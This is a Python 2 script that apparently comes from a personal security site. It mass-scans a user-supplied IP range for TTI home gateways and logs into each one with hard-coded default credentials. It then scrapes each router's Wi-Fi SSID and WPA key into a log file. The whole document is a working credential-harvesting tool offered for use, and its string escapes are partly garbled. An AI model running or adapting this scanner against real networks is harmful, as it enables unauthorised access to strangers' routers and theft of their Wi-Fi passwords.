#!/usr/bin/env python # coding=utf-8 # code by 92ez.com # last modify time 2015-08-08 09:59 import Queue from threading import Thread import time import re import os import subprocess import urllib2 #ip to num def ip2num(ip): ip = [int(x) for x in ip.split('.')] return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3] #num to ip def num2ip(num): return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff) #get all ips list between start ip and end ip def ip_range(start, end): return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff] #main function def bThread(iplist): SETTHREAD = raw_input('Thread: ') print '[Note] Running.../n' threadl = [] queue = Queue.Queue() hosts = iplist for host in hosts: queue.put(host) threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))] for t in threadl: t.start() for t in threadl: t.join() #create thread class tThread(Thread): def __init__(self, queue): Thread.__init__(self) self.queue = queue def run(self): global PORT while not self.queue.empty(): host = self.queue.get() try: #print host checkTTI(host,PORT) except: continue def checkTTI(host,port): aimurl = "http://"+host+":"+port+"/ssid.cgi" username = 'login' password = 'gzcatvnet' auth = urllib2.HTTPBasicAuthHandler() auth.add_password('', aimurl, username, password) opener = urllib2.build_opener(auth, urllib2.CacheFTPHandler) urllib2.install_opener(opener) try: data = urllib2.urlopen(aimurl,timeout = 5) htmlcontent = data.read() data.close() resssid = re.findall(r'<input id=/"tmp_ssidid/" value=/"(.+?)/" size=/"16/" maxlength=/"16/">',htmlcontent) reskey = re.findall(r'<input name=/"wl_wpa_psk/" value=/"(.+?)/" size=/"32/" maxlength=/"32/" type=/"password/" >',htmlcontent) #print log print host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8') #write to log file try: LOGFILE.write(host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8')+'/n') LOGFILE.flush() finally: LOGFILE.flush() except: pass if __name__ == '__main__': print '/n########### Hunt the TTI Home Gateway ##########/n' print ' Author 92ez.com' print ' Last modify 2015-08-08 09:59/n' print '################################################/n' # global PORT PORT = '80' global LOGFILE LOGFILE = open(os.path.abspath('.')+'/TTI_KEY.log', 'w+') startIp = raw_input('Start IP: ') endIp = raw_input('End IP: ') iplist = ip_range(startIp, endIp) print '/n[Note] Will scan '+str(len(iplist))+" host.../n" bThread(iplist)